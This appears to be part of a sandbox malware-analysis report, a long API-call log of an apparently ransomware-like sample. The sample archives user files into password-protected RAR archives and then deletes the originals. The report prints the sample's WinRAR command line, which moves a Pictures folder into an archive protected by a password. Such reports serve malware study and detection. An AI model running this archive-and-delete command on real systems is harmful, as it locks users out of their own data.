System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Performance Ctr, time = 66849190387 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 3
Fn
File Write filename = Desktop.rar, size = 69472 True 1
Fn
Data
File Write filename = Desktop.rar, size = 98 True 1
Fn
Data
File Create filename = MKzdWyU3NziO.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 70348785924 True 1
Fn
File Read filename = MKzdWyU3NziO.m4a, size = 1048576, size_out = 43928 True 1
Fn
Data
File Read filename = MKzdWyU3NziO.m4a, size = 1004648, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Performance Ctr, time = 70349025917 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Performance Ctr, time = 73873027853 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 44032 True 1
Fn
Data
File Write filename = Desktop.rar, size = 100 True 1
Fn
Data
File Create filename = PWldfUkUS.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73873693334 True 1
Fn
File Read filename = PWldfUkUS.mp3, size = 1048576, size_out = 3930 True 1
Fn
Data
File Read filename = PWldfUkUS.mp3, size = 1044646, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Performance Ctr, time = 73873840650 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 4
Fn
System Get Time type = Performance Ctr, time = 73873957491 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 3
Fn
File Write filename = Desktop.rar, size = 3984 True 1
Fn
Data
File Write filename = Desktop.rar, size = 95 True 1
Fn
Data
File Create filename = Qes6-o-.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73874316231 True 1
Fn
File Read filename = Qes6-o-.docx, size = 1048576, size_out = 100913 True 1
Fn
Data
File Read filename = Qes6-o-.docx, size = 947663, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = Performance Ctr, time = 73874503922 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 4
Fn
System Get Time type = Performance Ctr, time = 73875276474 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 3
Fn
File Write filename = Desktop.rar, size = 101136 True 1
Fn
Data
File Write filename = Desktop.rar, size = 96 True 1
Fn
Data
File Create filename = TYcyuRxH.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73875796560 True 1
Fn
File Read filename = TYcyuRxH.mkv, size = 1048576, size_out = 14806 True 1
Fn
Data
File Read filename = TYcyuRxH.mkv, size = 1033770, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Performance Ctr, time = 73876176320 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 4
Fn
System Get Time type = Performance Ctr, time = 73876377848 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 3
Fn
File Write filename = Desktop.rar, size = 14848 True 1
Fn
Data
File Write filename = Desktop.rar, size = 96 True 1
Fn
Data
File Create filename = w9CVHhfkQl0.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73876655887 True 1
Fn
File Read filename = w9CVHhfkQl0.mkv, size = 1048576, size_out = 91951 True 1
Fn
Data
File Read filename = w9CVHhfkQl0.mkv, size = 956625, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Performance Ctr, time = 73876798647 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 3
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Performance Ctr, time = 73877505539 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 3
Fn
File Write filename = Desktop.rar, size = 92144 True 1
Fn
Data
File Write filename = Desktop.rar, size = 99 True 1
Fn
Data
File Create filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 77377216901 True 1
Fn
File Read filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, size = 1048576, size_out = 69590 True 1
Fn
Data
File Read filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, size = 978986, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Performance Ctr, time = 77377515946 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Performance Ctr, time = 80884153218 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 69760 True 1
Fn
Data
File Write filename = Desktop.rar, size = 117 True 1
Fn
Data
File Create filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 80885107852 True 1
Fn
File Read filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, size = 1048576, size_out = 26584 True 1
Fn
Data
File Read filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv, size = 1021992, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Performance Ctr, time = 80885327953 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 3
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Performance Ctr, time = 80885671823 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 3
Fn
File Write filename = Desktop.rar, size = 26672 True 1
Fn
Data
File Write filename = Desktop.rar, size = 121 True 1
Fn
Data
File Create filename = wfNksu nJRG5\qHh6uE8iAnd.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 80886086302 True 1
Fn
File Read filename = wfNksu nJRG5\qHh6uE8iAnd.xls, size = 1048576, size_out = 79803 True 1
Fn
Data
File Read filename = wfNksu nJRG5\qHh6uE8iAnd.xls, size = 968773, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 1
Fn
System Get Time type = Performance Ctr, time = 80886245567 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 4
Fn
System Get Time type = Performance Ctr, time = 80886835388 True 1
Fn
System Get Time type = Ticks, time = 10904532 True 3
Fn
File Write filename = Desktop.rar, size = 79952 True 1
Fn
Data
File Write filename = Desktop.rar, size = 112 True 1
Fn
Data
File Create filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84386496912 True 1
Fn
File Read filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, size = 1048576, size_out = 86131 True 1
Fn
Data
File Read filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi, size = 962445, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Performance Ctr, time = 84386775422 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
System Get Time type = Ticks, time = 10904547 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Performance Ctr, time = 84387678791 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 3
Fn
File Write filename = Desktop.rar, size = 86352 True 1
Fn
Data
File Write filename = Desktop.rar, size = 119 True 1
Fn
Data
File Create filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84388168487 True 1
Fn
File Read filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, size = 1048576, size_out = 27218 True 1
Fn
Data
File Read filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt, size = 1021358, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 1
Fn
System Get Time type = Performance Ctr, time = 84388441405 True 1
Fn
System Get Time type = Ticks, time = 10904563 True 3
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Performance Ctr, time = 84400037334 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 3
Fn
File Write filename = Desktop.rar, size = 27280 True 1
Fn
Data
File Write filename = Desktop.rar, size = 112 True 1
Fn
Data
File Create filename = wfNksu nJRG5\XTt3.swf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84400523644 True 1
Fn
File Read filename = wfNksu nJRG5\XTt3.swf, size = 1048576, size_out = 33177 True 1
Fn
Data
File Read filename = wfNksu nJRG5\XTt3.swf, size = 1015399, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 1
Fn
System Get Time type = Performance Ctr, time = 84400712315 True 1
Fn
System Get Time type = Ticks, time = 10904657 True 3
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Performance Ctr, time = 84401042596 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 3
Fn
File Write filename = Desktop.rar, size = 33312 True 1
Fn
Data
File Write filename = Desktop.rar, size = 105 True 1
Fn
Data
File Create filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 84401507454 True 1
Fn
File Read filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, size = 1048576, size_out = 99959 True 1
Fn
Data
File Read filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3, size = 948617, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 1
Fn
System Get Time type = Performance Ctr, time = 84401802355 True 1
Fn
System Get Time type = Ticks, time = 10904672 True 3
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Performance Ctr, time = 84402663786 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 3
Fn
File Write filename = Desktop.rar, size = 100224 True 1
Fn
Data
File Write filename = Desktop.rar, size = 115 True 1
Fn
Data
File Create filename = xipMOvrpEcaMKsnrOoK.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 87902321077 True 1
Fn
File Read filename = xipMOvrpEcaMKsnrOoK.m4a, size = 1048576, size_out = 67031 True 1
Fn
Data
File Read filename = xipMOvrpEcaMKsnrOoK.m4a, size = 981545, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Performance Ctr, time = 87902649367 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
System Get Time type = Ticks, time = 10904688 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Performance Ctr, time = 91404761946 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 67232 True 1
Fn
Data
File Write filename = Desktop.rar, size = 107 True 1
Fn
Data
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
File Write filename = Desktop.rar, size = 47 True 1
Fn
Data
System Get Time type = Ticks, time = 10904703 True 1
Fn
System Get Time type = Ticks, time = 10904703 True 1
Fn
File Write filename = Desktop.rar, size = 43 True 1
Fn
Data
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Performance Ctr, time = 91624477958 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
System Get Time type = Ticks, time = 10906903 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 18 True 1
Fn
Data
File Write filename = Desktop.rar, size = 19 True 1
Fn
Data
File Write filename = Desktop.rar, size = 3613 True 1
Fn
Data
File Write filename = Desktop.rar, size = 8 True 1
Fn
Data
File Delete filename = xipMOvrpEcaMKsnrOoK.m4a True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178123222 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
File Delete filename = wfNksu nJRG5\_acNQOwErx 4yX.mp3 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178534783 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\XTt3.swf True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178728535 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\WIsnHaDYoZ0.ppt True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95178897113 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\RFLcwh3Vitv1c_T4nL.avi True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179033290 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\qHh6uE8iAnd.xls True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179171378 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\GeJdlc0asWB3ISPXdFJ8.csv True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 1
Fn
System Get Time type = Performance Ctr, time = 95179323493 True 1
Fn
System Get Time type = Ticks, time = 10907418 True 2
Fn
File Delete filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf True 1
Fn
System Get Time type = Ticks, time = 10907433 True 1
Fn
System Get Time type = Ticks, time = 10907433 True 1
Fn
System Get Time type = Performance Ctr, time = 95179485161 True 1
Fn
System Get Time type = Ticks, time = 10907433 True 2
Fn
File Delete Directory directory = wfNksu nJRG5 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95188972497 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = w9CVHhfkQl0.mkv True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189137591 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = TYcyuRxH.mkv True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189424913 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = Qes6-o-.docx True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189590127 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = PWldfUkUS.mp3 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189744521 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = MKzdWyU3NziO.m4a True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95189896346 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = LFfk9JORsG.avi True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95190048082 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = L4T8mDg3vHms9Y.xls True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 1
Fn
System Get Time type = Performance Ctr, time = 95190198437 True 1
Fn
System Get Time type = Ticks, time = 10907527 True 2
Fn
File Delete filename = JhTtCfiuDFLeGwcL.bmp True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190371125 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = jGh255P.m4a True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190632390 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = HAuM_g1AD_0J.mp4 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95190834492 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = gblyrzexggw.exe True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95191087031 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
File Delete filename = FuvJMN.m4a True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 1
Fn
System Get Time type = Performance Ctr, time = 95191240036 True 1
Fn
System Get Time type = Ticks, time = 10907543 True 2
Fn
For performance reasons, the remaining 89 entries are omitted.
The remaining entries can be found in glog.xml.
Process #7: winrar.exe
3079 0
»
Information Value
ID #7
File Name c:\users\whuoxysd\appdata\local\temp\winrar.exe
Command Line C:\Users\WhuOXYsD\AppData\Local\Temp\\WinRAR.exe m -r -pMyPassword Pictures *
Initial Working Directory C:\Users\WhuOXYsD\Pictures\
Monitor Start Time: 00:00:46, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:22
OS Process Information
»
Information Value
PID 0x6ac
Parent PID 0x244 (c:\windows\syswow64\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username EGLAFTB1N8YA\WhuOXYsD
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A10
0x A40
0x 2C8
0x A78
0x 760
0x AF8
0x AFC
0x B48
0x 96C
0x 978
0x BA8
0x B90
0x 968
0x 970
0x 9D8
0x 808
0x 9D4
0x 9C8
0x 9CC
0x 9D0
0x 9C4
0x 810
0x 620
0x 9C0
0x 7DC
0x 854
0x 7FC
0x 784
0x 398
0x 53C
0x 90
0x 768
0x 848
0x 834
0x 7D8
0x 6F0
0x 84C
0x 788
0x 7B4
0x 7F8
0x 7AC
0x 68C
0x 4A4
0x 420
0x 4CC
0x 858
0x 8E4
0x BF4
0x 64
0x 574
0x 814
0x 38C
0x 804
0x 92C
0x 88C
0x 910
0x 3B8
0x 820
0x 824
0x 90C
0x 818
0x 6C0
0x 2EC
0x 5C0
0x 638
0x B40
0x B3C
0x B38
0x B34
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
Pictures.rar 9.10 MB MD5: 7bf2ee95ffc00b4496762468e4227d44
SHA1: f93457257e95c65a24ddc307132053c00c5a5b08
SHA256: 1e0611ee8df0cd446b1d7aa1c6719e4c42fddd6b51db155422cbe0c06b8e03b6
SSDeep: 196608:Oqc0UeJbHEOp0EV3pDYcBVrj7SzekHBhZk22Vp8QBvxWuH1e:MCJI+0gJYcPNCvkV8QOuQ 		False
...
Threads
Thread 0xa10
3079 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2019-04-02 12:04:15 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 12515963894 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x7fef7a20000 True 1
Fn
Module Get Address module_name = c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x77af7190 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x77b03520 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x77afbd90 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x77b2b710 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c384f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x77b2b230 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c200b0 True 1
Fn
System Get Time type = Performance Ctr, time = 12517499009 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x77ae0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDllDirectoryW, address_out = 0x77b2d8c0 True 1
Fn
File Add Search Path - True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, base_address = 0x13f160000, flags = GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT, GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Filename process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.ini, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
